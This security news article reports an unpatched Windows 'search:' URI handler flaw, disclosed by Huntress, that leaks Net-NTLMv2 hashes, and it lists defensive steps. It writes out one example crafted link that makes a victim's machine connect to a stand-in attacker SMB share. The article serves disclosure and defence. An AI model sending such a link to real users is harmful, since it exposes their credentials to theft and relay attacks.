Unpatched Windows Search URI Flaw Lets Attackers Steal NTLMv2 Hashes

Cybersecurity researchers at Huntress have disclosed an unpatched vulnerability in the Windows "search:" URI handler that can be weaponized to leak a user's NTLMv2 hash to a remote attacker. Discovered by Huntress researcher Andrew Schwartz, the flaw mirrors CVE-2026-33829—a spoofing bug in the Windows Snipping Tool's ms-screensketch: handler that Microsoft patched in April 2026—yet Microsoft has declined to issue a fix after responsible disclosure on April 15, 2026, stating that only "Important and Critical severity cases meet our bar for servicing."

The attack relies on the "crumb=location:" parameter accepted by the search: URI handler, allowing a crafted link such as `start "" "search:query=test&crumb=location:\\10.0.1.100\share"` to force the victim's machine to connect to an attacker-controlled Universal Naming Convention (UNC) path. This triggers NTLM authentication and exposes the user's Net-NTLMv2 hash, which can then be used in relay attacks against internal services. The technique is functionally identical to a previously documented method (CVE-2023-35636) reported by Varonis in February 2024, carrying the same Moderate severity rating and the same prerequisites as the Snipping Tool issue it resembles.

With no patch forthcoming, defenders are advised to block outbound SMB traffic on TCP/445 and TCP/139 from endpoints that don't require it, enforce SMB signing to prevent relay attacks, and disable NTLM wherever Kerberos can serve as an alternative. Organizations should audit outbound SMB rules with a port scanner to confirm rogue connections are blocked, and use a password checker to evaluate credential hygiene across accounts that may be exposed via leaked hashes. A broader privacy checkup can also help identify misconfigurations on Windows hosts that could be exploited through similar URI-handler abuse.

Huntress's disclosure underscores a recurring weakness in Windows URI handlers, where insufficient validation of user-supplied paths turns routine features into credential-exfiltration vectors. Until Microsoft revisits its servicing criteria or ships a fix, the burden falls on security teams to harden SMB egress policies, monitor for anomalous outbound connections, and educate users about the risks of clicking unverified links—even those that appear to originate from native Windows features.